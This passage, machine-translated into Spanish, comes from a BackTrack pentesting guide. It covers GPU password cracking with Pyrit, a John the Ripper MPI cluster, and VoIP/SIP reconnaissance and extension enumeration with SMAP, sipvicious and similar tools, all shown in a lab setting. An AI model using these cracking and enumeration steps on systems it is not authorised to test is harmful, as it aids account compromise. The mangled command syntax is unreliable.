controlador Nvidia. A continuacin, descargue el kit de herramientas CUDA, de acuerdo con la arquitectura de CPU: 32 64 Lo ideal es instalar el kit de herramientas CUDA en / opt. esta gua se presupone esta ruta de instalacin. Configurar las variables de entorno para que el comando NVCC funciona. Usted puede hacer esto aadiendo las siguientes lneas en el archivo / root / .bashrc archivo:
PATH = $ PATH :/ opt / cuda / bin LD_LIBRARY_PATH = $ LD_LIBRARY_PATH :/ opt / cuda / lib export PATH export LD_LIBRARY_PATH

A continuacin, ejecute:
root @ bt: ~ # source / root / .bashrc root @ bt: ~ # ldconfig

El propsito de esto era conseguir compilador NVCC instalado. Usted puede comprobar que todo est configurado correctamente:
root @ bt: ~ # que NVCC / Opt / cuda / bin / NVCC root @ bt: ~ # NVCC-V NVCC: NVIDIA (R) Cuda conductor compilador Copyright (c) 2005-2011 NVIDIA Corporation Construido sobre Sun_Mar_20_16: 45:27 _PDT_2011 Cuda herramientas de compilacin, versin 4.0, V0.2.1221 root @ bt: ~ #

Ahora que el controlador de Nvidia CUDA y kit de herramientas se instalan, podemos probar su funcionalidad con una herramienta GPU potencia, como Pyrit.
root @ bt: ~ # svn checkout http://pyrit.googlecode.com/svn/trunk/ Pyrit root @ bt: ~ # cd Pyrit / Pyrit && python setup.py construir && python setup.py install root @ bt: ~ # cd .. / .. / root @ bt: ~ # cd Pyrit / cpyrit_cuda && python setup.py construir && python setup.py install

Ejecutar un punto de referencia para ver que todo funciona como se espera:
root @ bt: ~ # Pyrit punto de referencia Pyrit 0.4.1-dev (svn R308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com Este cdigo se distribuye bajo la v3 Licencia Pblica General GNU + Punto de referencia en funcionamiento (63.787,8 PMKs / s) ... \ Computarizada 63.787,82 PMKs / s total. # 1: 'CUDA-Device # 1' GeForce GTX 295: 11558.7 PMKs / s (RTT 3,0) # 2: "CUDA-Device # 2 'GeForce GTX 295: 10912.5 PMKs / s (RTT 2.9) # 3: "CUDA-Device # 3 'GeForce GTX 295: 10632.1 PMKs / s (RTT 3,0) # 4: "CUDA-Device # 4 'GeForce GTX 295: 11654.7 PMKs / s (RTT 2.9) # 5: "CUDA-Device # 5" GeForce GTX 295: 10868.9 PMKs / s (RTT 2.9) # 6: "CUDA-Device # 6 'GeForce GTX 295: 10322.8 PMKs / s (RTT 3,0)

# 7: 'CPU Core (SSE2)': 500,7 PMKs / s (RTT 2.7) # 8: "CPU Core (SSE2) ': 508,9 PMKs / s (RTT 2.8)

xito! Ahora podemos utilizar las herramientas CUDA BackTrack impulsados desde dentro.

JTR grupo

La construccin de un Juan el destripador Cluster en Backtrack5 R2 y R3


En este tutorial vamos a crear un grupo que nos va a ayudar en la formacin de grietas hashes con John the Ripper. Lo primero que quiero hacer es instalar libssl-dev y MPICH2 despus de que lo configura. (Nota: secretword debe ser el mismo en cada mquina.)
root @ bt: ~ # apt-get install MPICH2 libssl-dev root @ bt: ~ # touch / etc / mpd.conf root @ bt: ~ # chmod 600 / etc / mpd.conf root @ bt: ~ # echo "secretword = bt" >> / etc / mpd.conf root @ bt: ~ # touch mpd.hosts root @ bt: ~ # echo "192.168.1.69:1" mpd.hosts >> root @ bt: ~ # chmod 600 mpd.hosts root @ bt: ~ # mpdboot root @ bt: ~ # mpdtrace bt root @ bt: ~ # mpdallexit

Ahora instale la versin de la MPI de John the Ripper.


root @ bt: ~ / Desktop # wget http://www.bindshell.net/tools/johntheripper/john-1.7.3.1-all-2mpi8.tar.gz root @ bt: ~ / Desktop # tar xvfz john-1.7.3.1-all-2-mpi8.tar.gz root @ bt: ~ / Desktop/john-1.7.3.1-all-2-mpi8/src # make clean linux-x86-sse2 root @ bt: ~ # mv-f john-1.7.3.1-all-2-mpi8 pentest / / contraseas / john-mpi

Despus de instalar la versin MPI de John the Ripper configuramos nuestro archivo / etc / hosts.
root @ bt: ~ # nano / etc / hosts 127.0.0.1 localhost 192.168.1.69 servidor 192.168.1.70 nodo1 # Las siguientes lneas son recomendables en equipos que pueden IPv6 :: 1 localhost ip6-localhost loopback ip6fe00 :: 0 ip6-localnet ff00 :: 0 ip6-mcastprefix ff02 :: 1 ip6-allnodes

ff02 :: 2 ip6-allrouters ff02 :: 3 ip6-allhosts

NOTA: Haga exactamente lo mismo en el cliente. Una vez que tenemos el servidor y la configuracin del cliente es el momento para que nuestro servidor SSH y transferir los archivos de configuracin desde el servidor al cliente.
root @ bt: ~ # ssh root@192.168.1.70 mkdir-p / root / .ssh root @ bt: ~ # cat / root / .ssh / id_rsa.pub | ssh root@192.168.1.70 'cat >> .ssh / authorized_keys' root @ bt: ~ # scp / root / mpd.hosts root@192.168.1.70 :/ root / root @ bt: ~ # scp / etc / mpd.conf root@192.168.1.70 :/ etc / root @ bt: ~ # scp / etc / hosts root@192.168.1.70 :/ etc /

Si partimos del cluster deberamos ver nuestro servidor y el cliente.


root @ bt: ~ # mpdboot-v - file = / root / mpd.hosts-n 2 mpdallexit en marcha bt LANZAMIENTO mpd en bt va DURACIN mpd en bt LANZAMIENTO mpd en 192.168.1.70 a travs bt2 DURACIN mpd en 192.168.1.70 root @ bt: ~ # mpdtrace bt bt2

Ahora vamos a probar nuestra agrupacin.


root @ bt: ~ # echo "admin: 21232f297a57a5a743894a0e4a801fc3"> / root / prueba root @ bt: ~ # scp / root / prueba root@192.168.1.70 root :/ / root @ bt: ~ # mpiexec-host 192.168.1.69-np 2 / pentest / passwords / john-mpi / run / john Formato: raw-MD5 / root / prueba Cargado un hash de la contrasea (Raw MD5 [prima-md5]) admin (admin) admin (admin) Tema: 1 suposiciones: 1 hora: 0:00:00:00 100% (1) c / s: 160 intentar: admin - Adminis Tema: adivina 0: 1 hora: 0:00:00:00 100% (1) c / s: 133 intentando: admin - admins

Pyrit grupo

La construccin de un Cluster Pyrit Backtrack5 R2 y R3


En este tutorial vamos a crear un clster en Backtrack5 R2 mediante Pyrit. Pyrit viene instalado por defecto en Backtrack5 R2. Si lo ha eliminado, slo tiene que utilizar aptget install para instalarlo. El primer paso para crear un grupo Pyrit es crear un archivo de configuracin.
root @ bt:. ~ # mkdir ~ / Pyrit

root @ bt: ~ # nano ~ / .pyrit / config root @ bt: ~ # cat ~ / .pyrit / config default_storage = file :/ / limit_ncpus = 0 rpc_announce = true rpc_announce_broadcast = false rpc_knownclients = 192.168.1.69 (Esta es la IP de los servidores) rpc_server = true workunit_size = 75000

Despus de tener el archivo de configuracin anterior en todas nuestras mquinas, se inicia el servidor.
root @ bt: ~ # Pyrit servir

Ahora, desde que el cliente debe ser capaz de ver ambos ncleos. NOTA: El comando Pyrit list_cores tiene un error que cuando se utiliza el servidor se bloquee.

Podemos probar nuestro cmulo de nueva construccin con opcin de punto de referencia Pyrit.
root @ bt: ~ # Pyrit punto de referencia

Si cambiar al servidor mientras se ejecuta el punto de referencia, se puede ver que en la actualidad uno cliente est conectado.

Voz sobre IP

Pentesting VoIP con BackTrack

Pentesting VOIP

Este artculo fue contribuido por NightRang3r. URL: http://www.back-track.de/index.php?page=team # SMTX Twitter: ! http://twitter.com/ # / NightRang3r Email: shai@exploit.co.il

Contenido
[hide] 1 Pruebas de Penetraci n con BackTrack VOIP 2 Tpico VoIP Topologas 2,1 Self Hos ted 2,2 Hos ted Ser vic es 2.3 Ser vici o Onl ine SIP 3 Fundament os SIP 3.1 Las soli citu des SIP / Mt odo s 3 3.2 Las res

Pruebas de Penetracin con BackTrack VOIP


VoIP es una tecnologa fascinante que ofrece muchos beneficios y soluciones rentables para la comunicacin. Cada vez ms las pequeas empresas y las empresas estn reemplazando sus viejos sistemas de telefona tradicionales con un sin basados en IP. Una PBX VoIP basado puede proporcionar muchas caractersticas, tales como: varias extensiones, identificador de llamadas, correo de voz, IVR, capacidades de grabacin de conversaciones, registro, uso con telfonos basados en hardware o software de base (tambin conocidos como telfonos de software). Hoy en da hay muchos proveedores de PBX, telfonos IP, servicios de VoIP y equipos tales como: Cisco, Avaya y Asterisk, SNOM, THOMSON ... Con la nueva tecnologa viene un nuevo reto, tanto para la parte defensiva y ofensiva de la seguridad, uno de los " grandes "peligros de las lneas telefnicas tradicionales es que es susceptible a intrusos. La "escuela vieja" manera de interceptar la lnea telefnica de alguien era conectar fsicamente un pequeo transmisor que se conecta dentro o fuera de sus instalaciones en alguna parte a lo largo del cable de telfono.

Sistemas de telefona IP tambin son susceptibles a la escucha, hacerlo en un entorno IP es un poco ms difcil de ejecutar, detectar y requieren ms los conocimientos y el conjunto adecuado de herramientas. En este artculo no vamos a hablar de un proveedor en particular o de la tcnica, pero vamos a echar un vistazo a los conceptos y las herramientas disponibles para atacar a nuestra disposicin VoIP en Backtrack Linux. El objetivo principal de este artculo es presentar las herramientas y su uso con el fin de ayudarle a elegir la herramienta adecuada para la situacin correcta. Vamos a examinar algunos vectores de ataque del mundo real y descubrir cmo BackTrack puede ayudarnos pentesting VoIP, tambin vamos a examinar algunas de las herramientas que se presentan en BackTrack y su uso.

Tpico VoIP Topologas


Hay varias maneras se puede telefona basada en IP implementadas, estas son algunas topologas comunes y su uso:

Auto Hosted
Una PBX (ie Asterisk) est instalado en el sitio del cliente y conectado a un ISP o proveedor de servicios de telefona PSTN a travs de una troncal SIP / PRI, el trfico de VoIP fluye a travs de una VLAN dedicada. Visio diagrama de Amir Avraham

Servicios de Alojamiento
No hay necesidad de un PBX en el sitio. Slo un switch, un router, telfonos IP y una conexin a la central a travs de proveedor de servicios de Internet o IP / VPN conexin, cada telfono se configura con informacin de la cuenta SIP.

Servicio en lnea SIP


Servicios como sipme.me proporciona una aplicacin para PC o los telfonos inteligentes y una cuenta gratuita sorbo, que ofrece precios ms bajos para las llamadas internacionales y las llamadas gratuitas entre los usuarios de los servicios mediante la asignacin de un nmero de telfono mvil a cada suscriptor.

SIP Basics
El SIP (Session Initiation Protocol) papel es configurar, cancelar o modificar una voz o una videollamada concentrndose la voz y / o el trfico de video soportado por un protocolo como RTP (Protocolo de transporte en tiempo real). SIP es un protocolo de capa de aplicacin que utiliza UDP para el transporte (TCP y SCTP se puede utilizar tambin). SIP normalmente utiliza los puertos 5060 TCP o UDP para sealizacin cifrada o 5061 para el transporte cifrado mediante TLS. SIP es un protocolo basado en ASCII que tiene algunos elementos similares, como en el protocolo HTTP utilizando una peticin / respuesta modelo. Al igual que una peticin HTTP de un navegador de una solicitud de cliente SIP se realiza mediante un URI SIP un agente de usuario y un mtodo / solicitud. SIP utiliza el correo electrnico como formato de direcciones: user / telfono @ dominio / IP es un tpico URI SIP se ve as:
sip: 205@192.168.1.100, sip: username@pbx.com, sip: 205@192.168.1.100: 5060

De acuerdo con la solicitud presentada por el cliente ser recibido una respuesta con un cdigo de estado o de error, las tablas siguientes se describen las peticiones y las respuestas disponibles en el protocolo SIP.

Pide SIP / Mtodos


Solicitar INVITAN ACK CANCELAR REGISTRO OPCIONES BYE Descripcin Se utiliza para invitar y dar cuenta de participar en una sesin de llamada. Acusar recibo de una peticin INVITE. Cancelar una solicitud pendiente. Registrar el usuario con un servidor SIP. Muestra informacin acerca de las capacidades de una persona que llama. Termina una sesin entre dos usuarios en una llamada. Indica que el destinatario (identificado por la URI de la solicitud) debe contactar a un tercero que utilice la informacin de contacto proporcionado en la solicitud.

CONSULTE

SUSCRBETE El mtodo SUBSCRIBE se utiliza para solicitar el estado actual y

actualizaciones de estado de un mando a distancia nodo. El mtodo NOTIFY se utiliza para notificar a un nodo SIP que un evento NOTIFICAR que ha sido solicitada por un mtodo anterior tiene SUBSCRIBE ocurrido.

Un ejemplo SIP "INVITE" Solicitud:


INVITAN SIP: 201@192.168.1.104 SIP/2.0 Via: SIP/2.0/UDP 192.168.1.102; rport; sucursal = z9hG4bKvbxaoqar Max-Delanteros: 70 A: De: "NightRanger" ; Tag = eihgg Call-ID: hfxsabthoymshub @ retroceder CSeq: 649 INVITE Contacto: Content-Type: application / sdp Allow: INVITE, ACK, BYE, CANCEL, OPTIONS, PRACK, CONSULTE, NOTIFY, SUBSCRIBE, INFO, MESSAGE Soportados: sustituye, norefersub, 100rel User-Agent: Twinkle/1.2 Content-Length: 310

SIP Respuestas
Respuesta 1xx Descripcin Respuestas informativos, solicitud recibida y ser procesada. Respuestas exitosas La accin fue recibida con xito, 2xx 3xx 4xx 5xx comprendido y aceptado. Respuestas de redireccin Solicitar respuestas fracaso de la peticin es sintcticamente incorrecta o no se pueden cumplir en el servidor. Las respuestas del servidor falla, el servidor incumplido una de las

aparentemente solicitud vlida. Respuestas globales fracaso de la solicitud no puede cumplirse en cualquier 6xx servidor.

Un ejemplo SIP "Trying" Respuesta:


Tratando SIP/2.0 100 Via: SIP/2.0/UDP 192.168.1.102; sucursal = z9hG4bKpmphujka, recibido = 192.168.1.102; rport = 5060 De: "NIghtRanger" ; Tag = eihgg A: Call-ID: hfxsabthoymshub @ retroceder CSeq: 650 INVITE User-Agent: Asterisk PBX Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, CONSULTE, suscribir, NOTIFIQUE Compatible con: sustituye Contacto: Content-Length: 0

SIP llamada entre dos telfonos Ejemplo

El telfono que llama enva una invitacin. El telfono llamado devuelve una respuesta de 100 (Tratar). El telfono llamado entonces comienza a sonar y enva una respuesta de 180 (Ringing). Cuando la persona toma el telfono el telfono llama enva una respuesta de 200 (OK). El telfono que llama enva una respuesta ACK. La conversacin se inicia a travs de RTP. Cuando la persona que llama cuelga el telfono una peticin BYE es enviada. El telfono que llama responde con 200 (OK).

De ataque
Antes de empezar con las herramientas que vamos a echar un vistazo a algunos tipos de ataque comunes VoIP: Recopilacin de informacin, Huella y recuento.

Seguimiento de llamadas de trfico y escuchas telefnicas. Atacar autenticacin. VLAN salto. Denegacin de servicio / Inundaciones. Suplantacin de identificacin de llamadas. Con el fin de probar las herramientas que ha configurado un sistema de Trixbox PBX y creado 6 extensiones. Me va a utilizar dos telfonos de software, es un cliente basado en Linux llamado Twinkle y el segundo es un cliente basado en Windows llamado X-Lite. Me va a utilizar la versin ltima y ms grande de Backtrack Linux que es R2. Usted puede encontrar la mayora de las herramientas de ataque de VoIP en Backtrack bajo el directorio "/ pentest / voip /" directorio:
root @ bt: ~ # cd / pentest / voip / root @ bt :/ pentest / voip #

O simplemente puede navegar a travs del men de KDE para el "Backtrack" "Voz sobre IP" submens:

Recopilacin de informacin
Esta fase es donde nos reunimos informacin acerca de la topologa, servidores y clientes para obtener informacin tanto como podamos a fin de lanzar un ataque exitoso. Lo que nos interesa es la bsqueda de hospederos vivos, el tipo y la versin PBX, servidores VoIP / gateways, clientes (hardware y software) los tipos y versiones, etc ... En vez de enumerar los nombres de usuario "" vamos a enumerar las extensiones SIP. Echemos un vistazo a algunas de las herramientas disponibles en Backtrack que nos ayuden a encontrar, identificar y enumerar los dispositivos de VoIP habilitadas.

SMAP
Backtrack incluye una gran herramienta llamada SMAP, que es un escner simple para dispositivos con capacidad SIP SMAP enva de varias solicitudes SIP en espera de respuestas de SIP habilitado router DSL, apoderados y agentes de usuario. Se podra considerar un mash up de NMAP y SIPSAK. SMAP uso:
root @ bt :/ pentest / VoIP / SMAP #. / SMAP SMAP 0.6.0 http://www.wormulon.net/ uso: SMAP [Opciones] -H: esta ayuda -D: aumentar la depuracin -O: activar huellas dactilares

-O: permitir una mayor toma de huellas dactilares detallado -L: el modo de aprendizaje de huellas dactilares -T: transporte TCP -U: transporte UDP (por defecto -P0: Tratar a todos los hosts en Internet - skip anfitrin descubrimiento -P : Puerto de destino -R : Mensajes al lmite de velocidad de segundo -D : Dominio SIP para usar sin provocar sip: -W : Tiempo de espera en milisegundos

Escaneado de un nico host:


root @ bt :/ pentest / VoIP / SMAP #. / SMAP 192.168.1.104 SMAP 0.6.0 http://www.wormulon.net/ 192.168.1.104: accesible ICMP, SIP habilitado 1 host escaneado, 1 alcanzable ICMP, 1 con capacidad SIP (100,0%)

Escaneado de un rango de direcciones IP:


root @ bt :/ pentest / VoIP / SMAP #. / 192.168.1.130/24 SMAP SMAP 0.6.0 http://www.wormulon.net/ 192.168.1.20: accesible ICMP, SIP habilitado 192.168.1.22: accesible ICMP, SIP habilitado 192.168.1.0: ICMP inalcanzable, SIP desactivado 192.168.1.1: ICMP inalcanzable, SIP desactivado 192.168.1.2: ICMP inalcanzable, SIP desactivado 192.168.1.3: ICMP inalcanzable, SIP desactivado ---- EDIT --192.168.1.250: ICMP inalcanzable, SIP desactivado 192.168.1.251: ICMP inalcanzable, SIP desactivado 192.168.1.252: ICMP inalcanzable, SIP desactivado 192.168.1.253: ICMP inalcanzable, SIP desactivado 192.168.1.254: ICMP inalcanzable, SIP desactivado 192.168.1.255: ICMP inalcanzable, SIP desactivado 256 hosts escaneados, 7 alcanzables ICMP, 2 con capacidad SIP (0,8%)

Ahora que hemos identificado a los anfitriones con capacidad SIP podemos utilizar SMAP de la huella digital del tipo cliente / servidor y versin:
root @ bt :/ pentest / VoIP / SMAP #. / SMAP-O 192.168.1.104 SMAP 0.6.0 http://www.wormulon.net/

192.168.1.104: accesible ICMP, SIP habilitado mejor estimacin (70% seguro) huella digital: Asterisk PBX SVN-r56579 troncoUser-Agent: Asterisk PBX 1 host escaneado, 1 alcanzable ICMP, 1 con capacidad SIP (100,0%)

En el caso de SMAP no poda nuestra huella anfitrin se utiliza el argumento-l para ponerlo en modo de aprendizaje para proporcionar alguna informacin til:
root @ bt :/ pentest / VoIP / SMAP #. / SMAP-l 192.168.1.104 SMAP 0.6.0 http://www.wormulon.net/ AVISO: test_accept: "Accept: application / sdp" AVISO: test_allow: "Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, CONSULTE, suscribir, NOTIFY" AVISO: test_supported: "Con el apoyo: sustituye" AVISO: test_via: capitalizacin de transporte: 2 AVISO: test_via: "sucursal; alias; recibido; rport" AVISO: test_via: Por favor, aadir cmpstr nuevo AVISO: test_via: capitalizacin de transporte: 2 192.168.1.104: accesible ICMP, SIP habilitado mejor estimacin (70% seguro) huella digital: Asterisk PBX SVN-r56579 troncoHUELLA informacin: newmethod = 501 accept_class = 2 allow_class = 201 supported_class = 8 via_class = 2 hoe_class = ignorar options = 200 brokenfromto = 404 PRACK = 481 mesa de ping = 501 invitar = 200 User-Agent: Asterisk PBX 1 host escaneado, 1 alcanzable ICMP, 1 con capacidad SIP (100,0%)

Otra caracterstica til de SMAP es el argumento-d, que permite la salida de depuracin para verbosidad intenta utilizar el o-junto con l a ver el proceso de toma de huellas dactilares en los detalles.
root @ bt :/ pentest / VoIP / SMAP #. / SMAP-d 192.168.1.104 SMAP 0.6.0 http://www.wormulon.net/ DEBUG: DEBUG: DEBUG: DEBUG: DEBUG: IP local: 212.235.66.182 IP local: 212.235.66.182 bind () con xito RAW socket abierto pasar de 1 a S_START S_PING

DEBUG: Responder ICMP Echo error DEBUG: 192.168.1.104 / 1 peticin: solicitud SIP OPTIONS (vlido) DEBUG: respuesta pertenece a la tarea 1 (192.168.1.104) DEBUG: ACK: ACK sip: localhost SIP/2.0 Via: SIP/2.0/UDP 212.235.66.182:12345; sucursal = z9hG4bK.56689, alias, recibido = 192.168.1.105; rport = 5060 De: ; Tag = 6b9ae50e67345d3b A: ; Tag = as14262fec Call-ID: 1992951560@212.235.66.182 CSeq: ACK 23915 Content-Length: 0 User-Agent: SMAP 0.6.0 --- Fin del ACK 192.168.1.104: accesible ICMP, SIP habilitado DEBUG: destruir la tarea 1 1 host escaneado, 1 alcanzable ICMP, 1 con capacidad SIP (100,0%)

SIPSAK
SIPSAK se utiliza para probar las aplicaciones habilitadas SIP y dispositivos que utilizan el mtodo de solicitud nica opcin. Podemos usarlo para huellas digitales y enumeracin. Usted no encontrar SIPSAK en el directorio "/ pentest / voip /" directorio, se puede ejecutar desde cualquier lugar simplemente escribiendo SIPSAK.
root @ bt: ~ # SIPSAK SIPSAK 0.9.6 por Nils Ohlmeier Copyright (C) 2002-2004 FhG Fokus Copyright (C) 2004-2005 Nils, informe de errores a Ohlmeier nils@sipsak.org rodaje: SIPSAK [-f archivo] [- L]-s SIPURI rastro: SIPSAK-T-s SIPURI usrloc: SIPSAK-U [-I | M] [-b NMERO] [-e NMERO] [-x NMERO] [-z NMERO]-s SIPURI usrloc: SIPSAK -I | M [-b NMERO] [-e NMERO]-s SIPURI usrloc: SIPSAK-U [-C SIPURI] [-x NMERO]-s SIPURI mensaje: SIPSAK-M [B-STRING] [-O CADENA] [-c SIPURI]-s SIPURI inundacin: SIPSAK-F [-e NMERO]-s SIPURI azar: SIPSAK-R [-t NMERO]-s parmetro SIPURI adicional en todos los modos: [-a CONTRASEA] [-d] [ -i] [-H HOSTNAME] [-l PUERTO] [-m nmero] [-n] [-N] [-r puerto] [-v] [-V] [-w]-h muestra este mensaje de ayuda - V imprime cadena de versin slo-f file El archivo que contiene el mensaje de SIP para enviar uso - por nivel de entrada-L desactivar CR (\ r) insercin en los archivos-s SIPURI la URI del servidor de destino en forma sip: [usuario @] nombre_servidor [: puerto]-T activa el modo de traceroute-U se activa el modo usrloc-I simula algunas llamadas exitosas con s mismo-M enva mensajes a s mismo-C SIPURI utilizar el URI como contacto en REGISTER-b Nmero del apndice nmero inicial de el nombre de usuario (por defecto: 0)-E Nmero de la numer de finalizacin del apndice del nombre de usuario-o nmero de nmero de dormir ms antes de enviar el siguiente peticin-x NMERO expira el campo de encabezado valor (por defecto: 15)-z NMERO activa el azar eliminacin de usuario encuadernaciones-F se activa el modo de inundacin-R activa los modues aleatorios (peligroso)-t Nmero El nmero mximo de caracteres destrozado en modo aleatorio (por defecto: duracin peticin)-l PORT del puerto local para usar (por defecto: ninguno) - r El puerto remoto (por defecto: 5060)-p objetivo peticin HOSTNAME (proxy saliente)-H HOSTNAME sobrescribe el nombre de host local en todo NMERO headers-m el valor de la cabecera max-forwards campo-n usar FQDN en lugar de direcciones IP en la Via-Line-i desactivar la insercin de un Via-Line-una contrasea para la autenticacin de contrasea (si la contrasea se omite = "")-u nombre de usuario de autenticacin STRING-d-v ignorar redireccionamientos cada v produce ms verbosidad (mx. 3) -w IP extracto de la advertencia en respuesta-g cadena de reemplazo para una marca especial en la sustitucin mensaje-G activa de las variables-N devuelve cdigos de salida compatible con Nagios-q Cadena de bsqueda de una

expresin regular en las respuestas y en caso de fallo de error de retorno-W NMERO volver advertencia Nagios si retransmisin> nmero B-STRING enviar un mensaje con la cadena como cuerpo-O CADENA Content-Disposition Nmero NMERO valor-P de los procesos de start-A Nmero Nmero de ejecuciones de pruebas e imprimir slo tiempos-S utilizan un mismo puerto para la recepcin de y el envo-c SIPURI utilizar el URI como en De MENSAJE-D multiplicador de tiempo de espera para INVITAR NMERO transacciones y medios de transporte confiables (por defecto: 64)-E STRING especificar de transporte a utilizar-j STRING agrega cabeceras adicionales a la solicitud

He aqu un ejemplo de uso de SIPSAK a un dispositivo de huella digital con capacidad SIP Podemos ver en el resultado de que el dispositivo que consulta es un Audiocodes MP-114 gateway FXS.
root @ bt: ~ # SIPSAK-vs-s sip: 192.168.1.221 mensaje recibido: SIP/2.0 200 OK Via: SIP/2.0/UDP 127.0.1.1:51601; sucursal = z9hG4bK.18a1b21f; rport, alias De: sip: sipsak@127.0.1.1: 51601; tag = 97ac9e5 A: sip: 192.168.1.221; tag = 1c1785761661 Call-ID: 159042021@127.0.1.1 CSeq: 1 OPCIONES Contacto: Compatible con: em, 100rel, temporizador, sustituye, camino, recursos prioridad Permitir: REGISTRO, OPTIONS, INVITE, ACK, CANCEL, BYE, notificar, PRACK, CONSULTE, INFO, SUBSCRIBE, UPDATE servidor:-Audiocodes-SIP-Gateway-MP 114 FXS/v.5.40A.040.005 X-Recursos: telchs = 4/0; mediachs = 0/0 Accept: application / sdp, application / simple-mensaje-resumen, el mensaje / sipfrag Content-Type: application / sdp Content- Longitud: 343 v = 0 o = 1785763980 1785763858 AudiocodesGW EN IP4 192.168.1.221 s = Telfono-Call C = EN IP4 192.168.1.221 t = 0 0 = 6000 m audio RTP / AVP 18 8 0 127 a = rtpmap: 18 G729 / a = 8000 fmtp: 18 annexb = no a = rtpmap: 8 PCMA/8000 a = rtpmap: 0 PCMU/8000 a = rtpmap: 127 telephone-event/8000 a = fmtp: 127 = 0-15 un ptime: 20 a = sendrecv a = RTCP: 6001 EN IP4 192.168.1.221 ** respuesta recibida despus de 67,923 ms ** SIP/2.0 200 OK final recibida

SIPScan
Sip-Scan es un escner simple para saborear hosts habilitados para que pueda escanear un solo host o una subred completa. Sip-scan uso:
root @ bt :/ pentest / voip / sipscan # / sip exploracin--. ayudar . / Sip-scan versin [unknown] llamado Getopt :: std :: getopts (versin 1,05), funcionando bajo la versin Perl 5.10.0. Uso: sip-scan [opciones] -V Ser detallado. -I ip | si Interface / IP SIP-headers (por defecto: IP desde ppp0) -P puerto puerto remoto para escanear. (Por defecto: 5060) -L puerto local origen de los paquetes. (Por defecto: 5060) -Dn [p] Espere n ms despus de cada paquete enviado (por defecto: 50ms) o si 'p' es dado, enve n paquetes por segundo (por defecto: 20) -Wn Wait n ms para las respuestas restantes (por defecto: 2000 ms)

Red de especificaciones contiene el comodn * nm o rangos.

Escaneo de una subred:


root @ bt :/ pentest / voip / sipscan #. / sip-scan-i eth0 192.168.1.1-254 192.168.1.20: Grandstream HT-502 V1.2A 1.0.1.35 192.168.1.21: Grandstream HT-502 V1.2A 1.0.1.35 192.168.1.22: Asterisk PBX 192.168.1.104: Asterisk PBX 192.168.1.128: FreeSWITCH-mod_sofia/1.0.trunk-16055 192.168.1.174: Grandstream HT-502 V1.2A 1.0.1.35 192.168.1.175: Asterisk PBX 1.6.0.9-samy-r27 192.168.1.219: "Exelmind de control de llamada Switch (CCS)" 192.168.1.248: MailVision HostLynx/2.1 'GA'

SVMAP
SVMAP forma parte de un conjunto de herramientas llamado sipvicious y es mi favorito escner de eleccin Puede ser utilizado para escanear identificar y huella digital de una sola direccin IP o un rango de direcciones IP. Svmap permite especificar el mtodo de la peticin que est siendo usado para la digitalizacin, el mtodo predeterminado es OPCIONES, ofrece depuracin y opciones de verbosidad e incluso permite escanear los registros SRV de SIP en el dominio de destino. Usted puede utilizar el modificador /. Svmap h-para ver todos los argumentos disponibles
. root @ bt :/ pentest / voip / sipvicious # / svmap.py uso: svmap.py [opciones] host1 host2 hostrange ejemplos: svmap.py 10.0.0.1-10.0.0.255 \> 172.16.131.1 sipvicious.org/22 10,0 ... .1.1/24 \> 1.1.1.1-20 1.1.2-20 * 4.1 * * svmap.py-s session1 - aleatorizar 10.0.0.1 / 8 svmap.py - resume session1-v svmap.py - p5060-5062-m 10.0.0.3-20 INVITAR

Escaneo de un rango de direcciones IP:


root @ bt :/ pentest / voip / sipvicious #. / svmap.py 192.168.1.1-254 | SIP Device | Agente de usuario | Huella | -------------------------------------------------- | 192.168.1.104:5060 | Asterisk PBX | disabled | | 192.168.1.103:5060 | Twinkle/1.4.2 | disabled |

Habilitar exploracin huellas digitales


. root @ bt :/ pentest / voip / sipvicious # / svmap.py 192.168.1.1-254 - fp

Extensiones Enumeracin
Enumeracin de extensin puede ayudar a un atacante mediante la bsqueda de extensiones vlidas en un sistema de VoIP que luego puede conducir a un ataque de fuerza bruta sobre las cuentas SIP. Enumeracin obras de ampliacin por los errores que examinan devueltos por los mtodos solicitudes SIP REGISTER como, opciones y INVITAR Svwar Svwar es tambin una herramienta de la suite sipvicious permite enumerar las extensiones utilizando una gama de extensiones o utilizar un archivo de diccionario svwar apoya todos los de los tres mtodos de enumeracin de extensin como se ha mencionado anteriormente, el mtodo por defecto para la enumeracin es registrarse.
Uso:

root @ bt :/ pentest / voip / sipvicious #. / svwar.py Uso: svwar.py [opciones] destino ejemplos: svwar.py-e100-999 10.0.0.1 svwar.py-d dictionary.txt 10.0.0.2

Ejemplo:

root @ bt :/ pentest / voip / sipvicious #. / 192.168.1.104 svwar.py-e100-400 | Extensin | Autenticacin | -----------------------------| 201 | reqauth | | 200 | reqauth | | 203 | reqauth | | 202 | reqauth | | 303 | reqauth | | 305 | reqauth |

Svwar ha identificado todas las extensiones que he creado en mi servidor Trixbox. Puede especificar otro mtodo sorbo utilizando el m-argumento, tambin se puede aadir-v o t-vv para mostrar ms informacin.
. root @ bt :/ pentest / voip / sipvicious # / svwar.py-e100-400 192.168.1.104 m-INVITE-v INFO: TakeASip: tratar de obtener ip auto .. puede tardar un rato INFO: root: iniciar el INFO motores: TakeASip: Ok dispositivo SIP INFO encontrados: TakeASip: extension '200 'existe - requiere autenticacin INFO: TakeASip: extension '201' existe - requiere autenticacin ----- Edit- --- INFO: TakeASip: extension '203 'existe - requiere autenticacin INFO: TakeASip: extension '303' existe requiere autenticacin INFO: TakeASip: extension '303 'existe - requiere autenticacin INFO:

TakeASip: extension '305' existe - requiere INFO autenticacin: root: contamos con 6 extensiones | Extensin | Autenticacin | ------------------------------ | 201 | reqauth | | 200 | reqauth | | 203 | reqauth | | 202 | reqauth | | 303 | reqauth | | 305 | reqauth | INFO: root: Tiempo total: 0:00:21.944731

Enumiax Enumiax se utiliza para enumerar los nombres de usuario de Asterisk protocolo de Cambio. Permite un ataque de diccionario o un nombre de usuario secuencial Adivinar
